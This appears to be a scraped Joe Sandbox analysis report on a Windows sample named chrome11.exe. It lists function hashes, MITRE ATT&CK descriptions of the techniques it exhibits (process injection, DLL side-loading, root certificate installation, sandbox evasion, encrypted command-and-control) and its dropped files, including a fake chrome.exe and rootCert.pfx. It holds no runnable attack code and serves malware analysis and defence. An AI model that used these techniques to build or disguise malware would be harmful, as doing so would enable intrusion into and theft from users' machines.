Function 00007FFB4AF71725 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a0f4da5711fb381dfdbfbe342ea20d8585489962d84aff0395795ab2760f37
Instruction ID: 4d4184f753cfa77a6b1957b1d532e919a5a1b9d832aa124a19e6c7cb57404880
Opcode Fuzzy Hash: 71a0f4da5711fb381dfdbfbe342ea20d8585489962d84aff0395795ab2760f37
Instruction Fuzzy Hash: C611E1B484E2C99FDB429F74C9155EDBFB4EF06300F1400EBE888C6093D538665AC751

Function 00007FFB4AF73F55 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1129e8fb23a6ab250f028fab9f3d20b35364a3eeef48f5ec1bd160afd867d0b0
Instruction ID: 4594b9cb2e0c385378060776a5c50d9035efa11b31817329fbdb437b20f06806
Opcode Fuzzy Hash: 1129e8fb23a6ab250f028fab9f3d20b35364a3eeef48f5ec1bd160afd867d0b0
Instruction Fuzzy Hash: 8711C5B5908A5E8FDBA8EF18C895BA877F1FB68341F1044EA904DE3691DA7069C48F40

Function 00007FFB4AF639E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 206d31fe4f1ae7dba0739c3e2055c0fd814c08b39be3809409b17bcd9a6ada17
Instruction ID: 278ba1c8c61982a13e12d6027501ef39932ee5c21983ee97e4f8545868dcb5d0
Opcode Fuzzy Hash: 206d31fe4f1ae7dba0739c3e2055c0fd814c08b39be3809409b17bcd9a6ada17
Instruction Fuzzy Hash: DA018170918A8D8FDF95EF28C8496EA7FF0FF28304F4402AAE809C3191DB389155CB81

Function 00007FFB4AF679B5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e78c7b0102733fe33ca214d263cdbb2055f888e87093c7903c075eaeb3732e
Instruction ID: d898c7d13d6bdc1cd82f8b70f52e18c7f7b731ad5084bfb2417a61c686a17b68
Opcode Fuzzy Hash: f9e78c7b0102733fe33ca214d263cdbb2055f888e87093c7903c075eaeb3732e
Instruction Fuzzy Hash: DBF03CB261CA8B4BEB94EE6CC8502E537A5FB88704B5401B5E45DC31D1CA38E812C780

Function 00007FFB4AF69F35 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9371fca2d29a736359e85aa20700e702ef07d92de1684f27fa3081527b416f3e
Instruction ID: 0be7504d0e9b38f16d44e976d548666a475b12a9f508d54064e6903508c76202
Opcode Fuzzy Hash: 9371fca2d29a736359e85aa20700e702ef07d92de1684f27fa3081527b416f3e
Instruction Fuzzy Hash: 54F0E27080C28D8FCB45EF24C9812DABFA0FF14300F4501EAD408C70C2D639D564C791

Function 00007FFB4AF72CE8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b13cfc889e7fea99cdf2eb19bdd299fa075c8ceead6db6cb7341c3206754f013
Instruction ID: 08ec9a876ce4bc2f8857c77d87d97aa25ba426d61ead9b980473d343bc47957a
Opcode Fuzzy Hash: b13cfc889e7fea99cdf2eb19bdd299fa075c8ceead6db6cb7341c3206754f013
Instruction Fuzzy Hash: A8F0B7748097198EDBA9EF24C55ABACB3B6EF05301F6044FDD40DD62A1DF356985CB00

Function 00007FFB4AF628C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f1047b16320158d130ebddd1e86cb6ee2b528e83004e9dcab1adfd3907d150
Instruction ID: a01e9f339d5896df61d78de32058af55ecf94d02886145c846c12759949cde4f
Opcode Fuzzy Hash: 55f1047b16320158d130ebddd1e86cb6ee2b528e83004e9dcab1adfd3907d150
Instruction Fuzzy Hash: B9D0127082854D9BDB15BF74D9016EAB358FB04304F4405B5E81CC60C1DE34A668C741

Non-executed Functions

Function 00007FFB4AD81442 Relevance: .9, Instructions: 936COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13dcb308b9a94c37e1b70c438c7c2ac5ad4793a42619e5f31e8b0e32941db385
Instruction ID: b4452018e0d97682e716bd84f1350548eb4b19fb47f20697c0b9a1349e8b0f62
Opcode Fuzzy Hash: 13dcb308b9a94c37e1b70c438c7c2ac5ad4793a42619e5f31e8b0e32941db385
Instruction Fuzzy Hash: 67729370A186098FDB0CEF58C8959FDB7B2FF98704F2042ADD41A67295CE35B842CB95

Function 00007FFB4AD814AD Relevance: .6, Instructions: 609COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fadc7838872b0396e4767c9c2e4cdb067ab65c23d2c60962157e04390227e831
Instruction ID: ed52c38b9afbca60e1c037c59199c2fc1f009097217897a13da01a1cd17a039f
Opcode Fuzzy Hash: fadc7838872b0396e4767c9c2e4cdb067ab65c23d2c60962157e04390227e831
Instruction Fuzzy Hash: 72228270A246098BDF1DDF68C8969FDB7B2FF98704F2042ADD41A63295CE31B442CB95

Function 00007FFB4AF691BD Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe690bcb9ae5c124663b6e25dce46ea10dc8855ba30fd3ec46887a6722c31290
Instruction ID: 91a7967785c21c19e8f2af25e63d603bd67e0f0892f6a66283fba7dc52543d3e
Opcode Fuzzy Hash: fe690bcb9ae5c124663b6e25dce46ea10dc8855ba30fd3ec46887a6722c31290
Instruction Fuzzy Hash: 00321EB0D0450A8FDB09DF64C5A19FEB7B2FF88304B6441AED516A7395CA367902CFA4

Function 00007FFB4AD73F86 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbe469549a9a9135a38562f1b6181caddf4b95a1d52977066024afc52ec057b
Instruction ID: be1c24f489356d10a688824aad1cb62b61558449b2d8c74f2e2ed33ddaf71742
Opcode Fuzzy Hash: 1cbe469549a9a9135a38562f1b6181caddf4b95a1d52977066024afc52ec057b
Instruction Fuzzy Hash: 5DF1C570A0CA8D8FEBA9EF28C8457E937E1FF54300F14426AE85DC7291DF34A9458B81

Function 00007FFB4AD80403 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2462911844.00007FFB4AD70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4ad70000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82cc24e644511461d9ae46a1caca0ced8461f0602d4d41938ff5a3b3e2de0d3d
Instruction ID: 57c4fdcc4544b3f8bfef6a1b69511a471a52e00fdc5ded792d766bc25e443dc9
Opcode Fuzzy Hash: 82cc24e644511461d9ae46a1caca0ced8461f0602d4d41938ff5a3b3e2de0d3d
Instruction Fuzzy Hash: 26F09270E5C5198EEF91EEACE840AFCF7B8FF1A300F5020A5D02DE7145DA24A8809B54

Function 00007FFB4AF6A79D Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

uJ, xrefs: 00007FFB4AF6A80D
{-_H, xrefs: 00007FFB4AF6A972
?J, xrefs: 00007FFB4AF6A968
?J, xrefs: 00007FFB4AF6A8AF

Memory Dump Source

Source File: 00000001.00000002.2464334471.00007FFB4AF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffb4af60000_chrome11.jbxd

Similarity

API ID:
String ID: uJ${-_H$?J$?J
API String ID: 0-1799404066
Opcode ID: c2a53e0393cfcb7bb7fa8312c2a831b3d88f833711680bea3efc29c9e5acce2b
Instruction ID: d6128b665bcb6423a0e922981f8e88671e0041b4a7616284863a7183d6b6406f
Opcode Fuzzy Hash: c2a53e0393cfcb7bb7fa8312c2a831b3d88f833711680bea3efc29c9e5acce2b
Instruction Fuzzy Hash: C8515371A08A0E8FDB48FFA8C855AEDB7F5FF58700F5401E5E409D3296CA38A8528B40

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report chrome11.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\Application\chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe:Zone.Identifier

C:\Program Files\Google\Chrome\Application\original.exe (copy)

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\619e693d49fb0ee0f621fb177cb4a39f_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome11.exe.log

C:\Users\user\AppData\Local\Temp\Tmp25EE.tmp

C:\Users\user\AppData\Local\Temp\Tmp260E.tmp

C:\Users\user\AppData\Local\Temp\rootCert.pfx

C:\Users\user\AppData\Local\Temp\tmp267C.tmp

C:\Users\user\AppData\Local\Temp\unique_laptops.txt

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\C3DAC379B834C7676F11C5756DB72DFAC6DF57BE

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\186830344FB169AC26ABDC086751364A5D3FEC73

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
chrome11.exe

Function 00007FFB4AD7AFC2 Relevance: 1.6, APIs: 1, Instructions: 128
networkCOMMON